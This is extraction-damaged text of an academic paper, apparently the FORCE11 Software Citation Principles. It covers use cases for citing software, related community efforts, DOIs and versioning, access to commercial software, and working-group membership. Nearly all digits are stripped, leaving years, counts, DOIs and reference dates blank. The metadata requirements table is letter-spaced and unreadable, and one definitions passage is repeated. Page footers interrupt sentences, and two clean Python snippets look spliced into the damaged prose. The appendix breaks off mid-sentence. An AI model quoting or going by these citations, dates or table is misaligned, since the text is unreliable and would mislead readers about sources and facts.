the group will produce a set of principles, illustrated with working examples, and a plan for dissemination and distribution. this group will not be producing detailed specifications for implementation, although it may review and discuss possible technical solutions.

the group gathered members (see appendix a) in april and may , and then began work in june. this materialized as a number of meetings and offline work by group members to document existing practices in member disciplines; gather materials from workshops and other reports; review those materials, identifying overlaps and differences; create a list of use cases related to software citation, recorded in appendix b; and subsequently draft an initial version of this document. the draft software citation principles document was discussed in a day-long workshop and presented at the force conference in april (https://www.force .org/meetings/force ). members of the workshop and greater force community gave feedback, which we recorded here in appendix c. this discussion led to some changes in the use cases and discussion, although the principles themselves were not modified. we also plan to initiate a follow-on implementation working group that will work with stakeholders to ensure that these principles impact the research process.

the process of creating the software citation principles began by adapting the force data citation principles (data citation synthesis group, ). these were then modified based on discussions of the force software citation working group (see appendix a for members), information from the use cases in section use cases, and the related work in section related work. we made the adaptations because software, while similar to data in terms of not traditionally having been cited in publications, is also different from data. in the context of research (e.g., in science), the term "data" usually refers to electronic records of observations made in the course of a research study ("raw data"), to information derived from such observations by some form of processing ("processed data"), or to the output of simulation or modeling software ("simulated data"). some confusion about the distinction between software and data comes in part from the much wider scope of the term "data" in computing and information science, where it refers to anything that can be processed by a computer; in that sense, software is just a special kind of data. because of this, citing software is not the same as citing data. a more general discussion about these distinctions is currently underway (https://github.com/danielskatz/software-vs-data).

the principles in this document should guide further development of software citation mechanisms and systems, and the reader should be able to look at any particular example of software citation to see if it meets the principles. while we strive to offer practical guidelines that acknowledge the current incentive system of academic citation, a more modern system of assigning credit is sorely needed. it is not that academic software needs a separate credit system from that of academic papers, but that the need for credit for research software underscores the need to overhaul the system of credit for all research products. one possible solution for a more complete description of the citations and associated credit is the transitive credit proposed by katz ( ) and katz & smith ( ).

use cases
we documented and analyzed a set of use cases related to software citation in force software citation working group (https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu), recorded in appendix b for completeness. table summarizes these use cases and makes clear what the requirements are for software citation in each case. each example represents a particular stakeholder performing an activity related to citing software, with the given metadata as the information needed to do that. in that table, we use the following definitions:
- "researcher" includes both academic researchers (e.g., postdoc, tenure-track faculty member) and research software engineers.
- "publisher" includes both traditional publishers that publish text and/or software papers as well as archives such as zenodo that directly publish software.
- "funder" is a group that funds software or research using software.
- "indexer" examples include scopus, web of science, google scholar, and microsoft academic search.
- "domain group/library/archive" includes the astrophysics source code library (ascl; http://ascl.net), the biomedical and healthcare data discovery index ecosystem (biocaddie; https://biocaddie.org), the computational infrastructure for geodynamics (cig; https://geodynamics.org), libraries, institutional archives, etc.
- "repository" refers to public software repositories such as github, netlib, the comprehensive r archive network (cran), and institutional repositories.
- "unique identifier" refers to unique, persistent, and machine-actionable identifiers such as a doi, ark, or purl.
- "description" refers to some description of the software such as an abstract, readme, or other text description.
- "keywords" refers to keywords or tags used to categorize the software.
- "reproduce" can mean actions focused on reproduction, replication, verification, validation, repeatability, and/or utility.
- "citation manager" refers to people and organizations that create scholarly reference management software and websites, including zotero, mendeley, endnote, refworks, bibdesk, etc., that manage citation information and semi-automatically insert those citations into research products.

all use cases assume the existence of a citable software object, typically created by the authors/developers of the software. developers can achieve this by, e.g., uploading a software release to figshare (https://figshare.com/) or zenodo (github, ) to obtain a doi. necessary metadata should then be included in a citation file (wilson, ) or machine-readable citation.jsonld file (katz & smith, ).
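as a concrete illustration of the kind of machine-readable citation metadata file just mentioned, the following minimal sketch (in python) writes a citation.jsonld-style file for a hypothetical package. the vocabulary loosely follows the schema.org terms reviewed under related work, and every value (package name, authors, doi, repository url, dates) is invented for the example rather than taken from any real project.

```python
import json

# hypothetical release metadata for an invented package "examplepkg";
# the keys loosely follow schema.org/codemeta terms, and all values are
# placeholders rather than a real doi, repository, or author list.
release_metadata = {
    "@context": "https://schema.org",
    "@type": "SoftwareSourceCode",
    "name": "examplepkg",
    "version": "1.2.0",
    "identifier": "https://doi.org/10.5281/zenodo.0000000",      # placeholder doi
    "codeRepository": "https://github.com/example/examplepkg",   # placeholder url
    "datePublished": "2016-04-01",
    "license": "https://spdx.org/licenses/MIT",
    "author": [
        {"@type": "Person", "givenName": "Ada", "familyName": "Example"},
        {"@type": "Person", "givenName": "Grace", "familyName": "Sample"},
    ],
    "description": "an invented research package used to illustrate citation metadata.",
    "keywords": ["software citation", "metadata", "example"],
}

# write the file alongside the source code so that humans, indexers, and
# citation managers can discover the citation metadata with each release.
with open("citation.jsonld", "w", encoding="utf-8") as fh:
    json.dump(release_metadata, fh, indent=2)
```

a human-readable citation file (wilson, ) can carry the same information as plain text or a bibtex entry; the advantage of a machine-readable variant is that repositories, indexers, and citation managers can harvest it without guessing.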
in that table, we use the following definitions: � “researcher” includes both academic researchers (e.g., postdoc, tenure-track faculty member) and research software engineers. � “publisher” includes both traditional publishers that publish text and/or software papers as well as archives such as zenodo that directly publish software. � “funder” is a group that funds software or research using software. � “indexer” examples include scopus, web of science, google scholar, and microsoft academic search. � “domain group/library/archive” includes the astronomy source code library (ascl; http://ascl.net); biomedical and healthcare data discovery index ecosystem (biocaddie; https://biocaddie.org); computational infrastructure for geodynamics (cig; https://geodynamics.org), libraries, institutional archives, etc. � “repository” refers to public software repositories such as github, netlib, comprehensive r archive network (cran), and institutional repositories. � “unique identifier” refers to unique, persistent, and machine-actionable identifiers such as a doi, ark, or purl. � “description” refers to some description of the software such as an abstract, readme, or other text description. � “keywords” refers to keywords or tags used to categorize the software. � “reproduce” can mean actions focused on reproduction, replication, verification, validation, repeatability, and/or utility. � “citation manager” refers to people and organizations that create scholarly reference management software and websites including zotero, mendeley, endnote, refworks, bibdesk, etc., that manage citation information and semi-automatically insert those citations into research products. all use cases assume the existence of a citable software object, typically created by the authors/developers of the software. developers can achieve this by, e.g., uploading a software release to figshare (https://figshare.com/) or zenodo (github, ) to obtain a doi. necessary metadata should then be included in a citation file (wilson, ) or machine-readable citation.jsonld file (katz & smith, ). when software is not smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu http://ascl.net https://biocaddie.org https://geodynamics.org https://figshare.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t a b le u se c a se s a n d b a si c m e ta d a ta re q u ir e m e n ts fo r so ft w a re c it a ti o n , a d a p te d fr o m f o r c e s o ft w a re c it a ti o n w o rk in g g ro u p . s o li d ci rc le s (� ) in d ic a te th a t th e u se ca se d ep en d s o n th a t m et a d a ta , w h il e p lu s si g n s (+ ) in d ic a te th a t th e u se ca se w o u ld b en efi t fr o m th a t m et a d a ta if a v a il a b le . b a si c re q u ir e m e n ts u se c a se u n iq u e id e n ti fi e r s o ft w a re n a m e a u th o r( s) c o n tr ib u to r ro le v e rs io n n u m b e r r e le a se d a te l o c a ti o n / re p o si to r y in d e x e d c it a ti o n s s o ft w a re li ce n se d e sc ri p ti o n k e y w o rd s e x a m p le st a k e h o ld e r( s) . u se so ft w a re fo r a p a p er � � � � � � + + r es ea rc h er . u se so ft w a re in /w it h n ew so ft w a re � � � � � � + + r es ea rc h er , so ft w a re en g in ee r . c o n tr ib u te to so ft w a re � � � + � � � + + r es ea rc h er , so ft w a re en g in ee r . 
d et er m in e u se / ci ta ti o n s o f so ft w a re � � � r es ea rc h er , so ft w a re en g in ee r . g et cr ed it fo r so ft w a re d ev el o p m en t � � � + � � + r es ea rc h er , so ft w a re en g in ee r . “ r ep ro d u ce ” a n a ly si s � � � � � + + r es ea rc h er . f in d so ft w a re to im p le m en t ta sk � � � � � + + + r es ea rc h er , so ft w a re en g in ee r . p u b li sh so ft w a re p a p er � � � � � � p u b li sh er . p u b li sh p a p er s th a t ci te so ft w a re � � � � � � � p u b li sh er . b u il d ca ta lo g o f so ft w a re � � � � � � � + + + in d ex er . b u il d so ft w a re ca ta lo g /r eg is tr y � � � � + + d o m a in g ro u p , li b ra ry , a rc h iv e . s h o w sc ie n ti fi c im p a ct o f h o ld in g s � � � r ep o si to ry . s h o w h o w fu n d ed so ft w a re h a s b ee n u se d � � � f u n d er , p o li cy m a k er . e v a lu a te co n tr ib u ti o n s o f re se a rc h er � � + � � e v a lu a to r, fu n d er . s to re so ft w a re en tr y � � � � � � + + c it a ti o n m a n a g er . p u b li sh m ix ed d a ta /s o ft w a re p a ck a g es � � � � � � + + + r ep o si to ry , li b ra ry , a rc h iv e smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ freely available (e.g., commercial software) or when there is no clear identifier to use, alternative means may be used to create citable objects as discussed in section access to software. in some cases, if particular metadata are not available, alternatives may be provided. for example, if the version number and release date are not available, the download date can be used. similarly, the contact name/email is an alternative to the location/repository. related work with approximately working group participants (see appendix a) representing a range of research domains, the working group was tasked to document existing practices in their respective communities. a total of documents were submitted by working group participants, with the life sciences, astrophysics, and geosciences being particularly well-represented in the submitted resources. general community/non domain-specific activities some of the most actionable work has come from the uk software sustainability institute (ssi) in the form of blog posts written by their community fellows. for example, in a blog post from , jackson ( ) discusses some of the pitfalls of trying to cite software in publications. he includes useful guidance for when to consider citing software as well as some ways to help “convince” journal editors to allow the inclusion of software citations. wilson ( ) suggests that software authors include a citation file that documents exactly how the authors of the software would like to be cited by others. while this is not a formal metadata specification (e.g., it is not machine readable) this does offer a solution for authors wishing to give explicit instructions to potential citing authors and, as noted in the motivation section (see motivation), there is evidence that authors follow instructions if they exist (huang, rose & hsu, ). in a later post on the ssi blog, jackson gives a good overview of some of the approaches package authors have taken to automate the generation of citation entities such as bibtex entries (jackson, ), and knepley et al. ( ) do similarly. while not usually expressed as software citation principles, a number of groups have developed community guidelines around software and data citation. van de sompel et al. 
( ) argue for registration of all units of scholarly communication, including software. in “publish or be damned? an alternative impact manifesto for research software,” chue hong ( ) lists nine principles as part of “the research software impact manifesto.” in the “science code manifesto” (barnes et al., ), the founding signatories cite five core principles (code, copyright, citation, credit, curation) for scientific software. perhaps in light of the broad range of research domains struggling with the challenge of better recognizing the role of software, funders and agencies in both the us (e.g., nsf, nih, alfred p. sloan foundation) and uk (e.g., sftc, jisc, wellcome trust) have sponsored or hosted a number of workshops with participants from across a range of smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ disciplines, specifically aimed at discussing issues around software citation (sufi et al., ; ahalt et al., ; software credit workshop, ; norén, ; software attribution for geoscience applications, ; allen et al., ). in many cases these workshops produced strong recommendations for their respective communities on how best to proceed. in addition, a number of common themes arose in these workshops, including ( ) the critical need for making software more “citable” (and therefore actions authors and publishers should take to improve the status quo), ( ) how to better measure the impact of software (and therefore attract appropriate funding), and ( ) how to properly archive software (where, how, and how often) and how this affects what to cite and when. most notable of the community efforts are those of wssspe workshops (http://wssspe.researchcomputing.org.uk/) and ssi workshops (http://www.software.ac.uk/ community/workshops), who between them have run a series of workshops aimed at gathering together community members with an interest in ( ) defining the set of problems related to the role of software and associated people in research settings, particularly academia, ( ) discussing potential solutions to those problems, ( ) beginning to work on implementing some of those solutions. in each of the three years that wssspe workshops have run thus far, the participants have produced a report (katz et al., ; katz et al., a; katz et al., b) documenting the topics covered. section . and appendix j in the wssspe report (katz et al., b) has some preliminary work and discussion particularly relevant to this working group. in addition, a number of academic publishers such as apa (mcadoo, ) have recommendations for submitting authors on how to cite software, and journals such as f research (http://f research.com/for-authors/ article-guidelines/software-tool-articles), softwarex (http://www.journals.elsevier.com/ softwarex/), open research computation (http://www.openresearchcomputation.com) and the journal of open research software (http://openresearchsoftware.metajnl.com) allow for submissions entirely focused on research software. domain-specific community activities one approach to increasing software “citability” is to encourage the submission of papers in standard journals describing a piece of research software, often known as software papers (see software papers). 
while some journals (e.g., transactions on mathematical software (toms), bioinformatics, computer physics communications, f research, seismological research letters, electronic seismologist) have traditionally accepted software submissions, the american astronomical society (aas) has recently announced they will accept software papers in their journals (aas editorial board, ). professional societies are in a good position to change their respective communities, as the publishers of journals and conveners of domain-specific conferences; as publishers they can change editorial policies (as aas has done) and conferences are an opportunity to communicate and discuss these changes with their communities. in astronomy and astrophysics: the astrophysics source code library (ascl; http://ascl.net) is a website dedicated to the curation and indexing of software used in the astronomy-based literature. in , the aas and github co-hosted a workshop smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://wssspe.researchcomputing.org.uk/ http://www.software.ac.uk/community/workshops http://www.software.ac.uk/community/workshops http://f research.com/for-authors/article-guidelines/software-tool-articles http://f research.com/for-authors/article-guidelines/software-tool-articles http://www.journals.elsevier.com/softwarex/ http://www.journals.elsevier.com/softwarex/ http://www.openresearchcomputation.com http://openresearchsoftware.metajnl.com http://ascl.net http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (norén, ) dedicated to software citation, indexing, and discoverability in astrophysics. more recently, a birds of a feather session was held at the astronomical data analysis software and systems (adass) xxv conference (allen et al., ) that included discussion of software citation. in the life sciences: in may , the nih held a workshop aimed at helping the biomedical community discover, cite, and reuse software written by their peers. the primary outcome of this workshop was the software discovery index meeting report (white et al., ) which was shared with the community for public comment and feedback. the authors of the report discuss what framework would be required for supporting a software discovery index including the need for unique identifiers, how citations to these would be handled by publishers, and the critical need for metadata to describe software packages. in the geosciences: the ontosoft (gil, ratnakar & garijo, ) project describes itself as “a community software commons for the geosciences.” much attention was given to the metadata required to describe, discover, and execute research software. the nsf-sponsored geo-data workshop (fox & signell, ) revolved around data lifecycle, management, and citation. the workshop report includes many recommendations for data citation. existing efforts around metadata standards producing detailed specifications and recommendations for possible metadata standards to support software citation was not within the scope of this working group. however some discussion on the topic did occur and there was significant interest in the wider community to produce standards for describing research software metadata. 
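the next paragraph surveys several of these metadata schemes and the codemeta crosswalk among them. as a rough, hypothetical sketch of what such a crosswalk can look like in code, the snippet below maps a handful of citation-relevant concepts between three schemes; the field choices are illustrative simplifications, not an authoritative or complete mapping.

```python
# a rough, illustrative crosswalk between a few software metadata schemes.
# the concepts and field names are simplifications made for this example.
CROSSWALK = {
    #  concept          codemeta/schema.org   python setup()   r DESCRIPTION
    "name":            ("name",               "name",          "Package"),
    "version":         ("version",            "version",       "Version"),
    "authors":         ("author",             "author",        "Authors@R"),
    "description":     ("description",        "description",   "Description"),
    "license":         ("license",            "license",       "License"),
    "repository":      ("codeRepository",     "url",           "URL"),
}

SCHEMES = {"codemeta": 0, "python": 1, "r": 2}

def translate(record: dict, source: str, target: str) -> dict:
    """re-express a metadata record from one scheme in another, keeping only
    the concepts covered by this simplified crosswalk."""
    src, dst = SCHEMES[source], SCHEMES[target]
    out = {}
    for fields in CROSSWALK.values():
        if fields[src] in record:
            out[fields[dst]] = record[fields[src]]
    return out

# example: turn python-style package fields into r DESCRIPTION-style fields
print(translate({"name": "examplepkg", "version": "1.2.0"}, "python", "r"))
```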
content specifications for software metadata vary across communities, and include doap (https://github.com/edumbill/doap/), an early metadata term set used by the open source community, as well as more recent community efforts like research objects (bechhofer et al., ), the software ontology (malone et al., ), edam ontology (ison et al., ), project credit (credit, ), the openrif contribution role ontology (gutzman et al., ), ontosoft (gil, ratnakar & garijo, ), rrr/jisc guidelines (gent, jones & matthews, ), or the terms and classes defined at schema.org related to the https://schema.org/softwareapplication class. in addition, language-specific software metadata schemes are in widespread use, including the debian package format (jackson & schwarz, ), python package descriptions (ward & baxter, ), and r package descriptions (wickham, ), but these are typically conceived for software build, packaging, and distribution rather than citation. codemeta (jones et al., ) has created a crosswalk among these software metadata schemes and an exchange format that allows software repositories to effectively interoperate. discussion in this section we discuss some the issues and concerns related to the principles stated in section software citation principles. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/edumbill/doap/ https://schema.org/ https://schema.org/softwareapplication http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ what software to cite the software citation principles do not define what software should be cited, but rather how software should be cited. what software should be cited is the decision of the author(s) of the research work in the context of community norms and practices, and in most research communities, these are currently in flux. in general, we believe that software should be cited on the same basis as any other research product such as a paper or book; that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers, perhaps following the force data citation working group principles, which state, “in scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited” (data citation synthesis group, ). some software which is, or could be, captured as part of data provenance may not be cited. citation is partly a record of software important to a research outcome , where provenance is a record of all steps (including software) used to generated particular data within the research process. research results, including data, increasingly depend on software (hannay et al., ), and thus may depend on the specific version used (sandve et al., ; wilson et al., ). furthermore, errors in software or environment variations can affect results (morin et al., ; soergel, ). this implies that for a data research product, provenance data will include some of the cited software. similarly, the software metadata recorded as part of data provenance will overlap the metadata recorded as part of software citation for the software that was used in the work. the data recorded for reproducibility should also overlap the metadata recorded as part of software citation. in general, we intend the software citation principles to cover the minimum of what is necessary for software citation for the purpose of software identification. 
some use cases related to citation (e.g., provenance, reproducibility) might have additional requirements beyond the basic metadata needed for citation, as table shows. software papers currently, and for the foreseeable future, software papers are being published and cited, in addition to software itself being published and cited, as many community norms and practices are oriented towards citation of papers. as discussed in the importance principle ( ) and the discussion above, the software itself should be cited on the same basis as any other research product; authors should cite the appropriate set of software products. if a software paper exists and it contains results (performance, validation, etc.) that are important to the work, then the software paper should also be cited. we believe that a request from the software authors to cite a paper should typically be respected, and the paper cited in addition to the software. derived software the goals of software citation include the linked ideas of crediting those responsible for software and understanding the dependencies of research products on specific software. in the importance principle ( ), we state that “software should be cited on the same basis as any other research product such as a paper or a book; that is, authors should cite citation can be used for many purposes, including for software: which software has been used in the work, which software has influenced the work, which software is the work superseding, which software is the work disproving, etc. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the appropriate set of software products just as they cite the appropriate set of papers.” in the case of one code that is derived from another code, citing the derived software may appear to not credit those responsible for the original software, nor recognize its role in the work that used the derived software. however, this is really analogous to how any research builds on other research, where each research product just cites those products that it directly builds on, not those that it indirectly builds on. understanding these chains of knowledge and credit have been part of the history of science field for some time, though more recent work suggests more nuanced evaluation of the credit chains (credit, ; katz & smith, ). software peer review adherence to the software citation principles enables better peer review through improved reproducibility. however, since the primary goal of software citation is to identify the software that has been used in a scholarly product, the peer review of software itself is mostly out of scope in the context of software citation principles. for instance, when identifying a particular software artifact that has been used in a scholarly product, whether or not that software has been peer-reviewed is irrelevant. one possible exception would be if the peer-review status of the software should be part of the metadata, but the working group does not believe this to be part of the minimal metadata needed to identify the software. citation format in reference list citations in references in the scholarly literature are formatted according to the citation style (e.g., ams, apa, chicago, mla) used by that publication. (examples illustrating these styles have been published by lipson ( ); the follow-on software citation implementation group will provide suggested examples.) 
as these citations are typically sent to publishers as text formatted in that citation style, not as structured metadata, and because the citation style dictates how the human reader sees the software citation, we recommend that all text citation styles support the following: a) a label indicating that this is software, e.g., [software], potentially with more information such as [software: source code], [software: executable], or [software: container], and b) support for version information, e.g., version . . . citations limits this set of software citation principles, if followed, will cause the number of software citations in scholarly products to increase, thus causing the number of overall citations to increase. some scholarly products, such as journal articles, may have strict limits on the number of citations they permit, or page limits that include reference sections. such limits are counter to our recommendation, and we recommend that publishers using strict limits for the number of citations add specific instructions regarding software citations to their author guidelines to not disincentivize software citation. similarly, publishers should not include references in the content counted against page limits. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unique identification the unique identification principle ( ) calls for “a method for identification that is machine actionable, globally unique, interoperable, and recognized by a community.” what this means for data is discussed in detail in the “unique identification” section of a report by the force data citation implementation group (starr et al., ), which calls for “unique identification in a manner that is machine-resolvable on the web and demonstrates a long-term commitment to persistence.” this report also lists examples of identifiers that match these criteria including dois, purls, handles, arks, and nbns. for software, we recommend the use of dois as the unique identifier due to their common usage and acceptance, particularly as they are the standard for other digital products such as publications. while we believe there is value in including the explicit version (e.g., git sha hash, subversion revision number) of the software in any software citation, there are a number of reasons that a commit reference together with a repository url is not recommended for the purposes of software citation: . version numbers/commit references are not guaranteed to be permanent. projects can be migrated to new version control systems (e.g., svn to git). in addition, it is possible to overwrite/clobber a particular version (e.g., force-pushing in the case of git). . a repository address and version number does not guarantee that the software is available at a particular (resolvable) url, especially as it is possible for authors to remove their content from, e.g., github. . a particular version number/commit reference may not represent a “preferred” point at which to cite the software from the perspective of the package authors. we recognize that there are certain situations where it may not be possible to follow the recommended best-practice. for example, if ( ) the software authors did not register a doi and/or release a specific version, or ( ) the version of the software used does not match what is available to cite. 
in those cases, falling back on a combination of the repository url and version number/commit hash would be an appropriate way to cite the software used. note that the “unique” in a uid means that it points to a unique, specific software version. however, multiple uids might point to the same software. this is not recommended, but is possible. we strongly recommend that if there is already a uid for a version of software, no additional uid should be created. multiple uids can lead to split credit, which goes against the credit and attribution principle ( ). software versions and identifiers there are at least three different potential relationships between identifiers and versions of software: . an identifier can point to a specific version of a piece of software. . an identifier can point to the piece of software, effectively all versions of the software. . an identifier can point to the latest version of a piece of software. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is possible that a given piece of software may have identifiers of all three types. in addition, there may be one or more software papers, each with an identifier. while we often need to cite a specific version of software, we may also need a way to cite the software in general and to link multiple releases together, perhaps for the purpose of understanding citations to the software. the principles in section software citation principles are intended to be applicable at all levels, and to all types of identifiers, such as dois, rrids, etc., though we again recommend when possible the use of dois that identify specific versions of source code. we note that rrids were developed by the force resource identification initiative (https://www.force .org/group/ resource-identification-initiative) and have been discussed for use to identify software packages (not specific versions), though the force resource identification technical specifications working group (https://www.force .org/group/resource- identification-technical-specifications-working-group) says “information resources like software are better suited to the software citation wg.” there is currently a lack of consensus on the use of rrids for software. types of software the principles and discussion in this document have generally been written to focus on software as source code. however, we recognize that some software is only available as an executable, a container, or a virtual machine image, while other software may be available as a service. we believe the principles apply to all of these forms of software, though the implementation of them will certainly differ based on software type. when software is accessible as both source code and another type, we recommend that the source code be cited. access to software the accessibility principle ( ) states that “software citations should permit and facilitate access to the software itself.” this does not mean that the software must be freely available. rather, the metadata should provide enough information that the software can be accessed. if the software is free, the metadata will likely provide an identifier that can be resolved to a url pointing to the specific version of the software being cited. for commercial software, the metadata should still provide information on how to access the specific software, but this may be a company’s product number or a link to a website that allows the software be purchased. 
as stated in the persistence principle ( ), we recognize that the software version may no longer be available, but it still should be cited along with information about how it was accessed. what an identifier should resolve to while citing an identifier that points to, e.g., a github repository can satisfy the principles of unique identification ( ), accessibility ( ), and specificity ( ), such a repository cannot guarantee persistence ( ). therefore, we recommend that the software identifier should resolve to a persistent landing page that contains metadata and a link to the software itself, rather than directly to the source code files, repository, or executable. this ensures smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.force .org/group/resource-identification-initiative https://www.force .org/group/resource-identification-initiative https://www.force .org/group/resource-identification-technical-specifications-working-group https://www.force .org/group/resource-identification-technical-specifications-working-group http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ longevity of the software metadata—even perhaps beyond the lifespan of the software they describe. this is currently offered by services such as figshare and zenodo (github, ), which both generate persistent datacite dois for submitted software. in addition, such landing pages can contain both human-readable metadata (e.g., the types shown by table ) as well as content-negotiable formats such as rdf or doap (https://github.com/edumbill/doap/). updates to these principles as this set of software citation principles has been created by the force software citation working group (https://www.force .org/group/software-citation-working- group), which will cease work and dissolve after publication of these principles, any updates will require a different force working group to make them. as mentioned in section future work, we expect a follow-on working group to be established to promote the implementation of these principles, and it is possible that this group might find items that need correction or addition in these principles. we recommend that this software citation implementation working group be charged, in part, with updating these principles during its lifetime, and that force should listen to community requests for later updates and respond by creating a new working group. future work software citation principles without clear worked-through examples are of limited value to potential implementers, and so in addition to this principles document, the final deliverable of this working group will be an implementation paper outlining working examples for each of the use cases listed in section use cases. following these efforts, we expect that force will start a new working group with the goals of supporting potential implementers of the software citation principles and concurrently developing potential metadata standards, loosely following the model of the force data citation working group. beyond the efforts of this new working group, additional effort should be focused on updating the overall academic credit/citation system. appendix a working group membership alberto accomazzi, harvard-smithsonian cfa alice allen, astrophysics source code library micah altman, mit jay jay billings, oak ridge national laboratory carl boettiger, university of california, berkeley jed brown, university of colorado boulder sou-cheng t. 
choi, norc at the university of chicago & illinois institute of technology neil chue hong, software sustainability institute smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/edumbill/doap/ https://www.force .org/group/software-citation-working-group https://www.force .org/group/software-citation-working-group http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tom crick, cardiff metropolitan university mercè crosas, iqss, harvard university scott edmunds, gigascience, bgi hong kong christopher erdmann, harvard-smithsonian cfa martin fenner, datacite darel finkbeiner, osti ian gent, university of st andrews, recomputation.org carole goble, the university of manchester, software sustainability institute paul groth, elsevier labs melissa haendel, oregon health and science university stephanie hagstrom, force robert hanisch, national institute of standards and technology, one degree imager edwin henneken, harvard-smithsonian cfa ivan herman, world wide web consortium (w c) james howison, university of texas lorraine hwang, university of california, davis thomas ingraham, f research matthew b. jones, nceas, university of california, santa barbara catherine jones, science and technology facilities council daniel s. katz, university of illinois (co-chair) alexander konovalov, university of st andrews john kratz, california digital library jennifer lin, public library of science frank löffler, louisiana state university brian matthews, science and technology facilities council abigail cabunoc mayes, mozilla science lab daniel mietchen, national institutes of health bill mills, triumf evan misshula, cuny graduate center august muench, american astronomical society fiona murphy, independent researcher lars holm nielsen, cern kyle e. niemeyer, oregon state university (co-chair) karthik ram, university of california, berkeley fernando rios, johns hopkins university ashley sands, university of california, los angeles soren scott, independent researcher smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frank j. seinstra, netherlands escience center arfon smith, github (co-chair) kaitlin thaney, mozilla science lab ilian todorov, science and technology facilities council matt turk, university of illinois miguel de val-borro, princeton university daan van hauwermeiren, ghent university stijn van hoey, ghent university belinda weaver, the university of queensland nic weber, university of washington ischool appendix b software citation use cases this appendix records an edited, extended description of the use cases discussed in section use cases, originally found in force software citation working group. this discussion is not fully complete, and in some cases, it may not be fully self-consistent, but it is part of this paper as a record of one of the inputs to the principles. we expect that the follow-on software citation implementation group will further develop these use cases, including explaining in more detail how the software citation principles can be applied to each as part of working with the stakeholders to persuade them to actually implement the principles in their standard workflows. researcher who uses someone else’s software for a paper one of the most common use cases may be researchers who use someone else’s software and want to cite it in a technical paper. this will be similar to existing practices for citing research artifacts in papers. 
“requirements” for researcher: � name of software � names of software authors/contributors � software version number and release date, or download date � location/repository, or contact name/email (if not publicly available) � citable doi of software � format for citing software in text and in bibliography possible steps: . software developers create citation file and associate with source code release/ repository. . researcher finds and uses software for research paper. . researcher identifies citation metadata file (e.g., “citation” file) associated with downloaded/installed software source code or in online repository/published location. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software appropriately, e.g., in methodology section; reference included in bibliography. researcher who uses someone else’s software for new software in this case, a researcher develops new software that incorporates or depends on existing software. in order to credit the developer(s), the researcher will include citations in his/her source code, documentation, or other metadata in a similar manner to papers. requirements for researcher: � name of software � names of software authors/contributors � software version number and release date � location/repository � citable doi of software � format for citing software in source code, documentation, or citation metadata file possible steps: . assume that software developers have created a citation file and associated with the source code release/repository. . researcher finds and uses software in the development of new software. . researcher identifies citation metadata file (e.g., “citation” file) associated with downloaded/installed software source code or in online repository/published location. citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software in source code, documentation, or other metadata- containing file. researcher who contributes to someone else’s software (open source project) a researcher wants to contribute to someone else’s software in the manner in which their contributions will be accepted and recognized. possible steps: . researcher finds information about the software, and how contributors will be recognized . researcher possibly submit a contributor license agreement (cla) or copyright assignment agreement (caa) to allow the contributed content to be distributed with the software being contributed to . researcher contributes to the software . software maintainers accept contribution, recognize researcher’s contribution, and update the software metadata as appropriate smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ researcher who wants to know who uses the researcher’s software this case is similar to a researcher who wants to find other papers/publications that cite a particular paper. a researcher wants to gauge the usage of her software within or across communities and measure its impact on research for both credit and funding. requirements: � uniquely identify software � indexed citations of software � indexed papers that use software steps: . 
researcher finds software official name or unique doi in metadata associated with downloaded/installed source code or in online repository/published location. . researcher searches for software, may use online indexer (e.g., scopus, web of science, google scholar) using software name or doi. . online indexer presents entry for software with list of citations, if any. ideally, entry will also include metadata contained in software citation file and citation example. researcher gets credit for software development at the academic/governmental institution, in professional career, etc this case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. requirements for researcher: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in an official cv, in a departmental/institutional review report, etc. � role in the software creation, that is linked to version or component � role in contributing to the software as a “package” (not just lines of code) development of benchmarks, testing, documentation, tutorials etc. researcher who wants to “reproduce” another person/group’s analysis when a researcher wants to understand or verify a research results from another researcher, they would like to use the same software. note that accessing the exact same software is necessary but not sufficient for reproducibility. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirements for researcher: � name of software � location/repository for the exact release that was used � doi or other persistent handle for that specific release � release has all components necessary for reproducing the work (note: this ideally also means sample inputs and outputs) researcher who wants to find a piece of software to implement a task this is the case where a research is looking for software to use but wants to understand whether it is being used in a scholarly fashion. for example, a researcher searches through a software repository and finds a package that might be useful. they look to find whether it has been used by others in the scientific literature. requirements: � either the software documentation page has a reference to existing literature that makes use of it. � there is a 